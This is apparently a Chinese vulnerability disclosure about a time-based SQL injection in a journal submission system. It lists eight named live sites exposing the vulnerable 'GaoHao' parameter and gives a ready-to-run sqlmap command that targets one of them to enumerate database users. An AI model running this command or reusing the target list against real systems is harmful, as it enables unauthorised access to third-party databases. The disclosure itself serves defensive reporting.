某期刊投稿系统SQL注入漏洞

### 简要描述： RT ### 详细说明： 南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞，可获取数据库任意数据... 官网：http://www.025journal.com/ [<img src="https://images.seebug.org/upload/201411/19101553639b711fa4324545655bfe6bda7ded4b.jpg" alt="QQ图片20141119101310.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19101553639b711fa4324545655bfe6bda7ded4b.jpg) 案例： http://www.gjmzyfs.com/web/ViewAbstract.aspx?GaoHao=IJ20130428 http://www.cjge-manuscriptcentral.com/Web/ViewAbstract.aspx?GaoHao=wcbx12000102 http://www.lcmzxzz.com/Web/ViewAbstract.aspx?GaoHao=mz11001028 http://gaojian.xhnj.com/Web/ViewAbstract.aspx?GaoHao=NJ11000389 http://xb.cuit.edu.cn/Web/ViewAbstract.aspx?GaoHao=xx12000105 http://j.chinatransducers.com/Web/ViewAbstract.aspx?GaoHao=cg12000968 http://ctc.hlglzz.com/web/ViewAbstract.aspx?GaoHao=hl14001736 http://www.jsnyxb.com/Web/ViewAbstract.aspx?GaoHao=nky12000647 是延时注入 ### 漏洞证明： 我就只演示1个站了 sqlmap.py -u "http://www.gjmzyfs.com/web/ViewAbstract.aspx?GaoHao=IJ20130428%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch SQLmap注入语句 [<img src="https://images.seebug.org/upload/201411/1910184883b1df6247db102ec04ebb1f1531a565.jpg" alt="QQ图片20141119101824.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1910184883b1df6247db102ec04ebb1f1531a565.jpg) [<img src="https://images.seebug.org/upload/201411/191018544ae3f212c473c516783bd7d7cd226910.jpg" alt="QQ图片20141119101842.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191018544ae3f212c473c516783bd7d7cd226910.jpg)